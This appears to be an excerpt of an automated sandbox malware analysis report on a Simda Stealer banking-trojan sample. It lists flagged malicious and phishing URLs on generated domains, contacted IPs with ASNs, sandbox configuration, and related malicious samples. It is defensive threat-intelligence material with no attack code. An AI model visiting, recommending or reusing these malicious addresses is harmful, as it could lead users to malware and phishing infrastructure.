                                                                                                                                                                                                            http://lykyfen.com/login.phpsvchost.exe, 00000002.00000003.1501618192.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1702355410.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498623748.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1512365775.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711907800.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1486513335.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710889329.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lykywid.com/login.phpsvchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vopycyf.com/login.phpsvchost.exe, 00000002.00000003.1545295076.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1544887919.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1542434740.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1539305897.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://pumydyg.com/login.phpsvchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qexylup.com/login.phpsvchost.exe, 00000002.00000003.1411284154.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1610082181.0000000008B24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1389905582.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1615937487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1402185075.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617654306.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1613723889.0000000008B28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1411345133.0000000002F34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1401679434.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1841589649.0000000001139000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008EEC000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.00000000014FC000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.2054776037.00000000093A0000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2086886336.0000000009561000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.1859768092.000000000147F000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2073814977.000000000936A000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1919088226.0000000008414000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1795928621.0000000000838000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1804176921.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.1826196829.0000000000C79000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.2033815046.000000000881B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lysyxuj.com/login.phpsvchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://pupylug.com/psvchost.exe, 00000002.00000003.1859997516.0000000002FAB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gacykas.com/login.phpsvchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vocymak.com/login.phpsvchost.exe, 00000002.00000003.1556061520.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841242367.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1800870882.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1547357675.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gatyveh.com/login.phpsvchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104244256.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1587336760.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1587864442.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown

                                                                                                                                                                                                            World Map of Contacted IPs

                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                                                                            Public IPs

                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                            3.94.10.34
                                                                                                                                                                                                            		lygynud.comUnited States
                                                                                                                                                                                                            		14618AMAZON-AESUStrue
                                                                                                                                                                                                            106.15.232.163
                                                                                                                                                                                                            		unknownChina
                                                                                                                                                                                                            		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
                                                                                                                                                                                                            64.190.63.136
                                                                                                                                                                                                            		www.sedoparking.comUnited States
                                                                                                                                                                                                            		11696NBS11696USfalse
                                                                                                                                                                                                            72.52.179.174
                                                                                                                                                                                                            		pltraffic7.comUnited States
                                                                                                                                                                                                            		32244LIQUIDWEBUSfalse
                                                                                                                                                                                                            154.85.183.50
                                                                                                                                                                                                            		qegyval.comSeychelles
                                                                                                                                                                                                            		134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                                                                                                                                                                                            64.225.91.73
                                                                                                                                                                                                            		galynuh.comUnited States
                                                                                                                                                                                                            		14061DIGITALOCEAN-ASNUStrue
                                                                                                                                                                                                            99.83.170.3
                                                                                                                                                                                                            		puzylyp.comUnited States
                                                                                                                                                                                                            		16509AMAZON-02UStrue
                                                                                                                                                                                                            52.34.198.229
                                                                                                                                                                                                            		lygyvuj.comUnited States
                                                                                                                                                                                                            		16509AMAZON-02UStrue
                                                                                                                                                                                                            75.2.71.199
                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                            		16509AMAZON-02UStrue
                                                                                                                                                                                                            103.150.10.48
                                                                                                                                                                                                            		gtm-sg-6l13ukk0m05.qu200.comunknown
                                                                                                                                                                                                            		59253LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSGtrue
                                                                                                                                                                                                            23.253.46.64
                                                                                                                                                                                                            		gahyqah.comUnited States
                                                                                                                                                                                                            		19994RACKSPACEUStrue
                                                                                                                                                                                                            199.191.50.83
                                                                                                                                                                                                            		galyqaz.comVirgin Islands (BRITISH)
                                                                                                                                                                                                            		40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                                                                                                                                            13.248.169.48
                                                                                                                                                                                                            		pupydeq.comUnited States
                                                                                                                                                                                                            		16509AMAZON-02UStrue
                                                                                                                                                                                                            103.224.212.210
                                                                                                                                                                                                            		lyxynyx.comAustralia
                                                                                                                                                                                                            		133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                                                                                                                                                                                            76.223.67.189
                                                                                                                                                                                                            		qexyhuv.comUnited States
                                                                                                                                                                                                            		16509AMAZON-02UStrue
                                                                                                                                                                                                            18.208.156.248
                                                                                                                                                                                                            		pupycag.comUnited States
                                                                                                                                                                                                            		14618AMAZON-AESUStrue
                                                                                                                                                                                                            208.100.26.245
                                                                                                                                                                                                            		lyvyxor.comUnited States
                                                                                                                                                                                                            		32748STEADFASTUStrue
                                                                                                                                                                                                            199.59.243.227
                                                                                                                                                                                                            		77026.bodis.comUnited States
                                                                                                                                                                                                            		395082BODIS-NJUSfalse
                                                                                                                                                                                                            103.224.182.252
                                                                                                                                                                                                            		vofycot.comAustralia
                                                                                                                                                                                                            		133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                                                                                                                                                                                            178.162.203.211
                                                                                                                                                                                                            		unknownGermany
                                                                                                                                                                                                            		28753LEASEWEB-DE-FRA-10DEtrue
                                                                                                                                                                                                            85.17.31.82
                                                                                                                                                                                                            		gatyfus.comNetherlands
                                                                                                                                                                                                            		60781LEASEWEB-NL-AMS-01NetherlandsNLtrue
                                                                                                                                                                                                            44.221.84.105
                                                                                                                                                                                                            		gadyciz.comUnited States
                                                                                                                                                                                                            		14618AMAZON-AESUStrue
                                                                                                                                                                                                            154.212.231.82
                                                                                                                                                                                                            		gadyniw.comSeychelles
                                                                                                                                                                                                            		133201COMING-ASABCDEGROUPCOMPANYLIMITEDHKtrue
                                                                                                                                                                                                            188.114.96.3
                                                                                                                                                                                                            		lysyvan.comEuropean Union
                                                                                                                                                                                                            		13335CLOUDFLARENETUStrue

                                                                                                                                                                                                            General Information

                                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                            Analysis ID:1553805
                                                                                                                                                                                                            Start date and time:2024-11-11 18:06:41 +01:00
                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                            Overall analysis duration:0h 10m 15s
                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                            Number of analysed new started processes analysed:28
                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                            Number of injected processes analysed:13
                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                            Sample name:uavINoSIQh.exe
                                                                                                                                                                                                            renamed because original name is a hash value
                                                                                                                                                                                                            Original Sample Name:6cfcadc2ed5bb29ee8a1ff27c5b04c2481ee1e77.exe
                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                            Classification:mal100.bank.troj.spyw.expl.evad.winEXE@10/50@2167/24
                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                                            • Successful, ratio: 99%
                                                                                                                                                                                                            • Number of executed functions: 118
                                                                                                                                                                                                            • Number of non-executed functions: 197
                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                            • Found application associated with file extension: .exe

                                                                                                                                                                                                            Warnings

                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 2.23.209.189, 2.23.209.144, 2.23.209.187, 2.23.209.135, 2.23.209.149, 2.23.209.141, 2.23.209.140, 2.23.209.133, 2.23.209.130, 2.23.209.158, 2.23.209.154, 2.23.209.150, 40.126.31.69, 20.190.159.23, 20.190.159.4, 20.190.159.2, 40.126.31.67, 20.190.159.0, 20.190.159.75, 20.190.159.71, 104.208.16.94, 2.23.209.143, 2.23.209.156, 2.23.209.137, 20.189.173.20, 52.168.117.173, 2.23.209.179, 2.23.209.177, 2.23.209.182, 2.23.209.176, 2.23.209.181
                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): www.bing.com, onedsblobprdeus16.eastus.cloudapp.azure.com, prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, www.tm.v4.a.prd.aadg.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, www-www.bing.com.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, e86303.dscx.akamaiedge.net, www.bing.com.edgekey.net, login.live.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net, onedsblobprdcus16.centralus.cloudapp.azure.com
                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                            • VT rate limit hit for: uavINoSIQh.exe

                                                                                                                                                                                                            Simulations

                                                                                                                                                                                                            Behavior and APIs

                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                            12:08:20API Interceptor7x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                            12:08:39API Interceptor465777x Sleep call for process: svchost.exe modified

                                                                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                                                                            IPs

                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            3.94.10.347DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • lymyxid.com/login.php
                                                                                                                                                                                                            AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                            • ctdtgwag.biz/wikoehfueo
                                                                                                                                                                                                            E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                                                                                                            • ctdtgwag.biz/xyrpanl
                                                                                                                                                                                                            Y2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                            • gvijgjwkh.biz/maxlthgls
                                                                                                                                                                                                            AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • ypituyqsq.biz/grbkwbsae
                                                                                                                                                                                                            SetupRST.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • ctdtgwag.biz/dpaslnrfmhydrsi
                                                                                                                                                                                                            AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • ctdtgwag.biz/dpop
                                                                                                                                                                                                            RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                            • gvijgjwkh.biz/unx
                                                                                                                                                                                                            PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                            • gvijgjwkh.biz/lwgexo
                                                                                                                                                                                                            PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                            • gvijgjwkh.biz/njgjrpxmf
                                                                                                                                                                                                            106.15.232.1637DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 106.15.232.163:8000/dh/147287063_472994.html
                                                                                                                                                                                                            64.190.63.1367DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • ww16.vofycot.com/login.php?sub1=20241112-0352-0187-b8de-fd2bfab34f87
                                                                                                                                                                                                            http://afilias-grs.netGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • ww1.afilias-grs.net/search/tsc.php?ses=ogcIVruNZX5wQoGiwEz0Cq5PlN8zbbyp9Yq8dJFsn9poLX66IqkUhYVtAoJVb1AVRMXAtM65AaycMcjRMYAhdanh4H9VedEkUUDj7sc72cCMrn4Aq1jlr5Cf3Gyi37eSFszvqR2Z1jp_ezLSbToMVTMtkjDzo_LiuICxKqxU1ViilTwANTlr5WASZHBeFyN9K17m6E3E5ah97JIYIlDvt1EGmzUgNAGCXUTJBPD90zmFYlGgcsrWr9x5sRfW2BLGGMk8_iHKL0K_Iui8SV31UmfqbTFkZA14T8LZNQ7C4KUa_tBEFu-HS0j_I6Y4wh0p5m1bWRgdCQ_T3rEK468UUMrsAoUYxdvCJFLI5qVszq4s5qkp2l0O3xrQTkw&cv=2
                                                                                                                                                                                                            OjKmJJm2YT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • ww16.vofycot.com/login.php?sub1=20240908-1854-132f-8c2f-134916a1e9d0
                                                                                                                                                                                                            5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • ww16.vofycot.com/login.php?sub1=20240908-1700-25c9-bc2e-507729a41b57
                                                                                                                                                                                                            uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • ww16.vofycot.com/login.php?sub1=20240908-0453-259e-befa-1cc84c51963f
                                                                                                                                                                                                            Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • ww16.vofycot.com/login.php?sub1=20240824-0248-364a-9808-e6df4ec839e7
                                                                                                                                                                                                            roundwood.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • ww16.vofycot.com/login.php?sub1=20240824-0244-0577-915a-f20bc3a7af60
                                                                                                                                                                                                            http://efense.com/v3/__https:/www.duke-energy.com/find-it-duke__%3B!!No0KQ4w!udAqG0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • sedoparking.com/frmpark/efense.com/Skenzor1/park.js
                                                                                                                                                                                                            http://leostop.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • ww1.leostop.com/search/tsc.php?200=NTkyMjkyNTEx&21=OC40Ni4xMjMuMzM=&681=MTcyMTk2Nzk4MTgxODg2ZmRhZDJjNzU3NTZlMTc0NmFkMjA5N2NhNTYx&crc=688a5d6af653e3a6b7501c60b740173e6added63&cv=1
                                                                                                                                                                                                            4C49F078D9E8409D98D83AEBA2C037339680B2ABF7471B599E736A7AD99FB08D.exeGet hashmaliciousBdaejec, SocelarsBrowse
                                                                                                                                                                                                            • ww1.icodeps.com/?usid=27&utid=6773648594

                                                                                                                                                                                                            Domains

                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            pupycag.com7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 18.208.156.248
                                                                                                                                                                                                            OjKmJJm2YT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 18.208.156.248
                                                                                                                                                                                                            5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 18.208.156.248
                                                                                                                                                                                                            uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 18.208.156.248
                                                                                                                                                                                                            M62eQtS9qP.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 18.208.156.248
                                                                                                                                                                                                            Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 18.208.156.248
                                                                                                                                                                                                            roundwood.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 18.208.156.248
                                                                                                                                                                                                            spug64.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 34.174.78.212
                                                                                                                                                                                                            10627546311.zipGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 199.21.76.77
                                                                                                                                                                                                            pupydeq.com7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 13.248.169.48
                                                                                                                                                                                                            OjKmJJm2YT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 13.248.169.48
                                                                                                                                                                                                            5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 13.248.169.48
                                                                                                                                                                                                            uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 13.248.169.48
                                                                                                                                                                                                            M62eQtS9qP.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 13.248.169.48
                                                                                                                                                                                                            Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 13.248.169.48
                                                                                                                                                                                                            roundwood.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 13.248.169.48
                                                                                                                                                                                                            spug64.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 13.248.169.48
                                                                                                                                                                                                            aAP32K91Qx.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 194.195.211.98
                                                                                                                                                                                                            0HVVcaZuD1.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 194.195.211.98
                                                                                                                                                                                                            lyvyxor.com7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 208.100.26.245
                                                                                                                                                                                                            OjKmJJm2YT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 208.100.26.245
                                                                                                                                                                                                            5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 208.100.26.245
                                                                                                                                                                                                            uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 208.100.26.245
                                                                                                                                                                                                            M62eQtS9qP.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 208.100.26.245
                                                                                                                                                                                                            Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 208.100.26.245
                                                                                                                                                                                                            roundwood.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 208.100.26.245
                                                                                                                                                                                                            spug64.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 208.100.26.245
                                                                                                                                                                                                            kz2xIsjyEH.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 208.100.26.245
                                                                                                                                                                                                            10627546311.zipGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 208.100.26.245

                                                                                                                                                                                                            ASNs

                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            NBS11696US7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 64.190.63.136
                                                                                                                                                                                                            sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                            • 209.87.95.110
                                                                                                                                                                                                            jklarm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 64.190.7.239
                                                                                                                                                                                                            x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                            • 64.190.99.77
                                                                                                                                                                                                            ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                            • 209.87.95.120
                                                                                                                                                                                                            powerpc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                            • 209.87.95.115
                                                                                                                                                                                                            na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                            • 209.87.95.125
                                                                                                                                                                                                            na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                            • 209.87.95.125
                                                                                                                                                                                                            na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                            • 209.87.95.125
                                                                                                                                                                                                            na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                            • 209.87.95.125
                                                                                                                                                                                                            LIQUIDWEBUS7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 72.52.179.174
                                                                                                                                                                                                            sora.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                            • 69.167.163.88
                                                                                                                                                                                                            SHIPPING DOC.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                            • 50.28.1.56
                                                                                                                                                                                                            AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                            • 72.52.178.23
                                                                                                                                                                                                            E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                                                                                                            • 72.52.178.23
                                                                                                                                                                                                            AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 72.52.178.23
                                                                                                                                                                                                            SetupRST.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 72.52.178.23
                                                                                                                                                                                                            AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 72.52.178.23
                                                                                                                                                                                                            jklx86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 96.30.37.143
                                                                                                                                                                                                            nabm68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 50.28.115.41
                                                                                                                                                                                                            AMAZON-AESUS7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 44.221.84.105
                                                                                                                                                                                                            sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                            • 44.210.24.233
                                                                                                                                                                                                            Attachment-914011545-004.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 54.144.73.197
                                                                                                                                                                                                            http://swctch.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 52.2.182.50
                                                                                                                                                                                                            Payslip Notification #5800210900 11112024.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 23.22.254.206
                                                                                                                                                                                                            90876654545.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                                                            • 3.5.11.187
                                                                                                                                                                                                            GE AEROSPACE _WIRE REMITTANCE.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 54.167.120.151
                                                                                                                                                                                                            Sampension-file-846845087.pdfGet hashmaliciousCaptcha PhishBrowse
                                                                                                                                                                                                            • 52.21.71.129
